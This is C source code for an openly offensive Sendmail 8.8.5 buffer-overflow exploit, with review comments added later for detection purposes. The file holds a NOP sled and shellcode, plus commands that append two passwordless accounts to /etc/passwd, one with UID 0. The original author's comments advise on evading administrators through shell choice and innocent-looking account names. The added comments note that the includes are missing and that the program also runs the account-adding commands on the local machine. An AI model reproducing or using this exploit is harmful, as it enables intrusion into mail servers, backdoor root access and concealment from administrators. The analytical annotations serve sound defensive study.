. .
/* sendmail885.c
 * Sendmail 8.8.5 remote/local (if you use localhost for the host)
 * exploit. Could be exploitable on other versions.
 *
 * carparts original code by su1d
 *
 * Modified slightly by scud_
 * - Fixed a few things I felt might get you discovered very fast
 * - Also made this program a wee bit more user friendly
 *
 * Try gcc -o sendmail885 sendmail885.c to get this to compile
 */

/* NOTE(review): the eight #include directives below lost their header names
 * when this listing was extracted (the <...> operands are missing), so the
 * file does not compile as shown. The original names are not recoverable
 * from the page and have not been guessed here. */
#include
#include
#include
#include
#include
#include
#include
#include

#define NOP 0x90 /* DO NOT CHANGE - SIZE COMPUTED */

/* Raw machine-code payload placed directly after the NOP sled in main().
 * What it does is not documented anywhere on the page and is not described
 * here. From a detection standpoint the distinctive content of the SMTP
 * connection this program opens is: a 4097-byte run of 0x90, this byte
 * sequence, then the `commands` text below, all sent as one write. */
char shellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff";
/* DO NOT CHANGE - SIZE COMPUTED */

/* Carparts original set the shell to /bin/bash, I changed this to tcsh, since
   tsch doesnt have a log, but all of this *really* doesnt matter much.
   However, a sysadmin seeing a .bash_history file in / would not be a good
   thing. You could also just ln the history file to /dev/null */

/* Carparts original set the 2 new accounts to 'n0tr00t' and 'r00t'. This may
   be fine, but if a sysadmin did a who list and sees that, what do you think
   his next command will be? I left the r00t, but modded n0tr00t to stephen,
   since stephen sounds like such an innocent user.
*/

/* Two /etc/passwd lines carried in the payload. Both have an empty password
 * field (the "::" right after the name), home directory "/" and shell
 * /bin/tcsh; the second one has UID and GID 0. For an analyst, either shape
 * of entry in /etc/passwd - a UID-0 account that is not root, or any account
 * with an empty password field - is a strong indicator worth alerting on. */
char commands[] =
"/bin/echo \"stephen::1000:1000:Stephen:/:/bin/tcsh\" >> /etc/passwd\n"
"/bin/echo \"r00t::0:0:r00t:/:/bin/tcsh\" >> /etc/passwd\n";

/*
 * Entry point. argv[1] is a host name; the program resolves it, connects to
 * TCP port 25 and writes a single 8192-byte buffer. Exit status is -1 for a
 * usage error or an unresolvable host, 0 otherwise; no network call is
 * checked, so 0 does not mean anything was delivered.
 */
int main ( int argc, char **argv )
{
    int i;
    int sock;
    char *ptr;
    char *clear;
    char buf[8192];       /* sent in full below; bytes past the payload are never written */
    struct sockaddr_in sin;
    struct hostent *hp;

    if(argc<2) {
        /* Carparts original error message was a bit cryptic */
        printf("Usage: %s site.to.exploit\n", argv[0]);
        exit(-1);
    }

    /* Layout of buf: buf[0..4096] = 0x90 (4097 bytes, because the loop uses
     * <=), then the shellcode bytes including the string's terminating NUL,
     * then the commands text including its NUL, then "3824" without a NUL.
     * In total about 4.3 KB of the 8192-byte buffer is initialised. */
    ptr = buf;
    for(i=0;i<=4096;i++)
        buf[i] = NOP;
    ptr += i;
    memcpy(ptr,shellcode,sizeof(shellcode));
    ptr += sizeof(shellcode);
    clear = commands;
    memcpy(ptr,clear,sizeof(commands));
    ptr += sizeof(commands);
    memcpy(ptr,"3824",4);

    /* NOTE(review): `clear` points at `commands`, so this line runs the same
     * two "echo ... >> /etc/passwd" commands on the machine executing this
     * program, with the privileges of whoever runs it, before a single byte
     * goes over the network. Nothing in the header comment mentions this.
     * It is a textbook example of why code of this kind must be read line
     * by line in an isolated analysis environment and never simply run. */
    system(clear);

    printf("Connecting To %s\n",argv[1]);
    hp = gethostbyname(argv[1]);
    if(hp==NULL) {
        printf("Unknown Host\n");
        exit(-1);
    }
    /* Legacy BSD bzero/bcopy; the resolver result is copied into sin and the
     * address family is taken from the hostent rather than hard-coded. */
    bzero((char*) &sin, sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(25);

    /* socket(), connect() and send() return values are all ignored, so the
     * closing message is printed whether or not a connection was ever made.
     * Note also that the write happens immediately after connect(): the
     * server banner is never read and no SMTP command is issued first, which
     * is itself a usable anomaly for network-side detection. */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    connect(sock,(struct sockaddr *) &sin, sizeof(sin));
    /* sizeof(buf) is 8192 but only about 4.3 KB of it was written above; the
     * remainder is whatever happened to be on this process's stack, so the
     * sender leaks its own memory contents to the remote host. */
    send(sock,buf,sizeof(buf),0);
    close(sock);
    printf("Exploit Successfully Executed\n");
    return(0);
}